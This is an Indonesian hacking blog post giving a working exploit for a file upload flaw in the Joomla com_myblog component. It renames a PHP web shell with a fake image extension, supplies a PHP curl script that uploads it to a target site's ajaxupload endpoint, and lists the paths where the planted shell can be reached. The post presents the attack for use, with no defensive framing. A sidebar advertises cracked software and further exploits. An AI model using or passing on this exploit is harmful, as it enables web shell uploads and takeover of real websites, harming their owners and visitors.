Langsung aja gausah banyak bacod
expliot "joomla com_myblog"
Dork: no dork for child [ Use your brain ]
Exploit: people_hurt/index.php?option=com_myblog&task=ajaxupload
Vuln code : {error: 'No file has been uploaded.', msg: '' }
Type file : jpg, gif, jpeg, bmp, swf, doc etc.
Ubah shell anda menjadi yourshell.php.xxxjpg
Saran: upload dulu uploader, Karena file yg diminta ukurannya kecil.
Code php:
<?php
$uploadfile="yourshell.php.xxxjpg";
$ch = curl_init("http://target/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell acces :
target/images/yourshell.php.xxxjpg
target/images/0/yourshell.php.xxxjpg
target/images/blog/yourshell.php.xxxjpg
Oke segitu aja
Author : people_hurt - Indonesian Cyber Freedom
Popular Posts
-
Pinegrow Web Designer 2.9 Full Crack adalah sebuah software yang dapat anda gunakan untuk membuat sebuah halaman web dengan cara yang m...
-
Dork :inur:plugins/tevolution < Bisa di kembangin Exploit:wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/si...
-
Hi Guys after long Absence because study and some shits in real life i'm bak to share my privat tools with all today i gona sho...
-
Pengakuan mengejutkan terlontar dari mulut pelaku pembunuhan pembantu rumah tangga (PRT), Suti (50) yang tewas di rumah majikannya ...
-
Halaman Login terdapat pada website dinamis. Halaman ini adalah 'pintu' menuju halaman administrator, atau halaman user jika websi...
-
Cara Masuk Ke Website Yang Sibuk Seringkali kita kesulitan ketika ingin buru-buru membuka suatu website namun akibat penuhnya koneksi yang ...
-
Hai para pengunjungku yang sedang kesel karna di PC/LAPTOP sering muncul Dial-Up Connection, biasa disebabkan karna menginstall modem se...
-
Seperti yang kita ketahui bahwa bug SQL dan XSS sangat banyak , sampai saat ini pun masih banyak situs-situs yg mempunyai bug sql dan xss ,...
-
Tumbuhan-tumbuhan yang ada di alam sangat banyak jenisnya. Dari bergabgai jenis tumbuhan tersebut ada sebagian besarnya dimanfaatkan oleh ...
0 comments